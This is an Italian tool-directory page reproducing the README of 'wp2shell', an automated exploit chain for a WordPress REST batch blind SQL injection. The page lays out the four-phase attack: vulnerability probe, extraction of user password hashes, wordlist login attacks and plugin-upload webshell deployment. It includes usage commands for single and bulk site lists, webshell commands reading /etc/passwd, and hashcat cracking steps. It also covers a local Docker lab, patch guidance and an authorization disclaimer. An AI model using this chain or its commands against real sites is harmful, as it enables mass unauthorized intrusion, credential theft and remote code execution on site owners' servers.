Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wp2shell — Catena di exploit automatizzata per CVE-2026-63030 / CVE-2026-60137 — SQLi blind non autenticata tramite route-confusion batch REST di WordPress. Estrae gli hash degli utenti, decifra le credenziali, distribuisce una webshell. Supporta singoli obiettivi ed elenchi di siti in blocco. Solo per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/0xwhoknows/wp2shell
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHub0xwhoknows/wp2shell

wp2shell

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Catena di exploit automatizzata per CVE-2026-63030 / CVE-2026-60137 — SQLi blind non autenticata tramite route-confusion batch REST di WordPress. Estrae gli hash degli utenti, decifra le credenziali, distribuisce una webshell. Supporta singoli obiettivi ed elenchi di siti in blocco. Solo per test di sicurezza autorizzati.

Condividi

wp2shell

WordPress REST batch route-confusion blind SQL injection — catena di exploit automatizzata.

CVE-2026-63030 / CVE-2026-60137

Versioni interessateWordPress 6.9.0 – 6.9.4 e 7.0.0 – 7.0.1
CorrettoWordPress 6.9.5 / 7.0.2
SinkSQL author__not_in tramite parametro author_exclude desincronizzato
Autenticazione richiestaNessuna (SQLi non autenticata)

Solo per test di sicurezza autorizzati.


Come funziona

L'endpoint batch dell'API REST di WordPress (/wp-json/batch/v1) consente richieste batch annidate. Un payload di desincronizzazione a doppio annidamento sposta gli array interni $matches / $validation, instradando un valore author_exclude appositamente costruito nella SQL author__not_in senza sanitizzazione. Ciò consente una SQL injection non autenticata di tipo blind boolean e timing.

Catena di exploit — 4 fasi:

root@kitploit:~
Phase 1  Vulnerability check     batch marker probe + optional SQL timing
Phase 2  Hash harvest            blind SQLi extracts wp_users (login + hash)
Phase 3  Authentication          wordlist attack via wp-login.php
Phase 4  Webshell deployment     plugin ZIP upload -> RCE verify

Requisiti

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

Utilizzo

Target singolo

root@kitploit:~
python wp2shell.py http://target.com

Lista di siti (un URL per riga)

root@kitploit:~
python wp2shell.py sites.txt

Lista di siti + file password personalizzato

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

Credenziali note (salta la wordlist)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

Conferma la SQLi con timing

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

Senza permalink pretty

root@kitploit:~
python wp2shell.py http://target.com --rest-route

Tramite proxy Burp

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

Opzioni


File di output

FileContenuto
creds.txthttp://target=>user:pass (testo in chiaro se decifrata, hash altrimenti)
webshell.txtURL della webshell attiva
VULNERABLE.txtTutti i target in cui la fase 1 ha confermato la vulnerabilità

Tutti i file vengono accodati — i risultati si accumulano tra le diverse esecuzioni.

Uso della webshell — aggiungi ?cmd=COMMAND all'URL in webshell.txt:

root@kitploit:~
# browser
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

Cracking offline

Se la wordlist non trova la password, creds.txt contiene l'hash estratto:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

Quindi riesegui con la password decifrata:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

Laboratorio locale (Docker)

Avvia un'istanza vulnerabile di WordPress 7.0.1 per test locali sicuri.

Prima esecuzione — crea i volumi e installa WordPress:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

Avvii successivi:

root@kitploit:~
docker compose up -d db wordpress

Arresto:

root@kitploit:~
docker compose down

Reset completo (cancella tutti i dati):

root@kitploit:~
docker compose down -v

Esegui l'exploit contro il laboratorio:

root@kitploit:~
python wp2shell.py http://localhost:8080

Aggiornamento

Aggiorna a WordPress 6.9.5 o 7.0.2. La correzione valida la rotta batch prima di inoltrare le richieste annidate, impedendo la desincronizzazione che espone il sink SQL.


Note legali

Da utilizzare su sistemi di tua proprietà o per i quali disponi di esplicita autorizzazione scritta al test. L'uso non autorizzato è illegale.

Scarica lo strumento
FlagDefaultDescrizione
target—URL (http://target) o percorso del file con la lista dei siti
-p FILE—File con la lista delle password (una per riga)
--user—Salta la wordlist, usa questo nome utente
--password—Salta la wordlist, usa questa password
--confirm-sqlioffInvia una sonda SQL timing attiva dopo il controllo del marcatore
--rest-routeoffUsa /?rest_route=/batch/v1 (senza permalink pretty)
--sleep N3.0Ritardo SQL SLEEP() in secondi
--samples N3Coppie di campioni di timing per il calcolo della mediana
--timeout N30.0Timeout delle richieste HTTP
--prefix PREFIXwp_Prefisso delle tabelle del database
--proxy URL—Proxy HTTP/HTTPS
URLhttp://localhost:8080
Adminadmin / admin123
MySQL hostdb
MySQL user/passwpuser / wppass
Databasewordpress